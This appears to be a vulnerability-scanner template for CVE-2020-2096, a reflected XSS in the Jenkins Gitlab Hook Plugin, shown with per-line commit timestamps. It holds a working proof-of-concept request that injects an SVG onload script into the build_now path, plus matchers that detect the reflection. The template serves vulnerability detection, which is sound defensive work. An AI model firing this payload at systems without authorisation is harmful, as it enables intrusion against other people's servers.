2021-01-02 04:56:15 +00:00
id : CVE-2020-2096
2020-04-08 10:59:57 +00:00
info :
name : Jenkins Gitlab Hook XSS
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2021-03-10 10:53:21 +00:00
description : Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
2021-03-12 07:10:16 +00:00
reference : |
2021-03-10 11:31:41 +00:00
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
- http://www.openwall.com/lists/oss-security/2020/01/15/1
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
2021-02-05 19:44:41 +00:00
tags : cve,cve2020,jenkins,xss
2020-04-08 10:59:57 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 10:59:57 +00:00
matchers :
- type : status
status :
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 14:42:57 +00:00
- type : word
words :
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-04-08 10:59:57 +00:00
part : body